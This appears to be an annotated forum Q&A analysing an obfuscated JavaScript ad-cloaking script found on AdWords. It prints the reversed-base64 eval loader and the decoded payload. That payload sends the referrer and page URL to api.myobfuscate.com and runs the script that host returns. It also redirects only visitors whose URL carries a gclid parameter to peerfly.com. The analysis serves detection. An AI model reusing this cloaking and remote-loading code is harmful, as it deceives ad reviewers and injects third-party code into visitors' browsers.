How was this script generated?

Hello,

I need to figure out how this script was generated. I discovered someone using it on the AdWords platform. It includes a redirect URL, but it is encrypted with eval code. How can I solve this?

I think this is a redirect script, because clicking their ad redirects to one site, but copying and pasting the display URL into the address bar redirects to another site.

Can someone enlighten me, please: how was this script created?

Thanks…

<!--
  Obfuscated loader as posted. Reading the visible code:
  * _0x362a is a string table: the base64 alphabet, an empty string, and the
    method names charAt, indexOf, fromCharCode and length.
  * _0IO looks each input character up in that alphabet, packs four 6-bit
    values into 24 bits and emits up to three bytes; index 64 ('=') marks
    padding. That is a base64 decoder.
  * _1OO walks its argument from the last character to the first, i.e. it
    reverses the string.
  * The final statement reverses I0l, base64-decodes it and passes the result
    to eval, so the real payload never appears in readable form in the page
    source.
  NOTE(review): the listing was damaged by the forum's rendering and will not
  parse as pasted: the quotes are typographic, several bracketed calls have
  lost their brackets (e.g. _0x6ea4x3_0x362a[3], String_0x362a[4]), the two
  "+ +" pairs look like split increments, and the loop decrement shows as a
  dash character. Treat it as a record of the sample, not as runnable code.
  For triage, an eval( ... ) sink fed by a long reversed base64 literal is the
  pattern to look for; decode the literal offline rather than loading the page.
-->
<script language=“javascript” type=“text/javascript”>var _0x362a=

[“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=”,“”,“charAt”,“indexOf”,“fromCharCode”,“length”];function _0IO(_0x6ea4x2)

{var _0x6ea4x3=_0x362a[0];var _0x6ea4x4,_0x6ea4x5,_0x6ea4x6,_0x6ea4x7,_0x6ea4x8,_0x6ea4x9,_0x6ea4xa,_0x6ea4xb,_0x6ea4xc=0,_0x6ea4xd=_0x362a

[1];do{_0x6ea4x7=_0x6ea4x3_0x362a[3];_0x6ea4x8=_0x6ea4x3[_0x362a[3]](_0x6ea4x2[_0x362a[2]](_0x6ea4xc+

+));_0x6ea4x9=_0x6ea4x3_0x362a[3];_0x6ea4xa=_0x6ea4x3[_0x362a[3]](_0x6ea4x2[_0x362a[2]](_0x6ea4xc+

+));_0x6ea4xb=_0x6ea4x7<<18|_0x6ea4x8<<12|_0x6ea4x9<<6|

_0x6ea4xa;_0x6ea4x4=_0x6ea4xb>>16&0xff;_0x6ea4x5=_0x6ea4xb>>8&0xff;_0x6ea4x6=_0x6ea4xb&0xff;if(_0x6ea4x9==64){_0x6ea4xd+=String[_0x362a[4]]

(_0x6ea4x4);} else {if(_0x6ea4xa==64){_0x6ea4xd+=String_0x362a[4];} else {_0x6ea4xd+=String[_0x362a[4]]

(_0x6ea4x4,_0x6ea4x5,_0x6ea4x6);} ;} ;} while(_0x6ea4xc<_0x6ea4x2[_0x362a[5]]);;return _0x6ea4xd;} ;function _1OO(_0x6ea4xf){var

_0x6ea4x10=_0x362a[1],_0x6ea4xc=0;for(_0x6ea4xc=_0x6ea4xf[_0x362a[5]]-1;_0x6ea4xc>=0;_0x6ea4xc–){_0x6ea4x10+=_0x6ea4xf[_0x362a[2]]

(_0x6ea4xc);} ;return _0x6ea4x10;} ;var

I0l='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSMPlEKkxWaoNEZuVGcwFmLw80TKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIw

80TgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9z

Lt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cuEzTJpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ASMPlEIyFmd7cSRzUCdwlmcjN3LDNTJEdTJ5ATJBBTJC

NTJ3ITJvEjMxMzNvIDM3QzLw8Cev02bj5SesZmclVGcv8SQzUCc0RHa3ITJENTJu9Wa0F2YvxmL39GZul2d5ATJ5ATJBBTJCdTJ5ATJBBTJ5ITJsxWduR0MlEjMlMXZoNGdh1GOyUiZplD

MlEEMlI0MlkjMlc2LklGbjdmRzUyQ1UyL4ITJoNGdh1mL6xmc1BHMyUCRzUCMyUyclh2Y0FWbwITJyFmd5ATJBBTJCNTJMJVVuQnbl1Wdj9GZwITJENTJwITJ6xmc1BHMyUichZXRzUCdw

lmcjN3QzUyJ9UGchN2cl9FIyFmd’;eval(_0IO(_1OO(I0l)));</script>

You can solve it by logging the value to be eval’d, which ends up being:


// Decoded payload: the text the loader hands to eval, kept exactly as logged.
// _escape holds a percent-encoded inline <script>; the last line writes it into the page.
var _escape='%3Cscript%3Evar%20purlz%20%3D%20document.URL%3B%0A%09var%20matches%20%3D%20purlz.match%28/%5C%3Fgclid/g%29%3B%0A%09if%28matches%21%3Dnull%29%0A%09%7B%0A%09%09window.location%3D%27http%3A//peerfly.com/x/0/4702/73121/%27%3B%0A%09%7D%3C/script%3E';
// Builds a <script> element whose src points at api.myobfuscate.com over plain http,
// with the visitor's referrer and the current page URL appended as query parameters.
// NOTE(review): every page view is therefore reported to that third-party host, and the
// page will execute whatever script the host returns. Presumably this was added by the
// obfuscation service rather than by the script's author; not confirmed from this page.
var IO1 = document.createElement('script');
IO1.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
// Attaching the element to <head> is what makes the browser request the remote script.
var OO0 = document.getElementsByTagName('head')[0];
OO0.appendChild(IO1);
// Writes the decoded _escape markup into the document, so the inline script inside it runs.
document.write(unescape(_escape)); 

Which you can unescape (the `_escape` string) to find that it performs the following check:


// Inner script recovered from _escape.
// The redirect fires only when the page URL carries a gclid query parameter, which
// Google Ads appends to ad-click landing URLs (auto-tagging). A visitor who types or
// pastes the address has no gclid, so this script does not redirect them. That
// difference is what makes the page behave one way for ad clicks and another way
// for direct visits; comparing the page with and without the parameter exposes it.
var purlz = document.URL;
// NOTE(review): the escaped payload contains %5C%3Fgclid, which decodes to \?gclid
// (a literal "?"). The doubled backslash below looks like a rendering artifact; as
// printed, the pattern would match "gclid" with an optional leading backslash.
var matches = purlz.match(/\\?gclid/g);
if (matches != null) {
    // Ad-click traffic is sent on to the peerfly.com URL.
    window.location = 'http://peerfly.com/x/0/4702/73121/';
}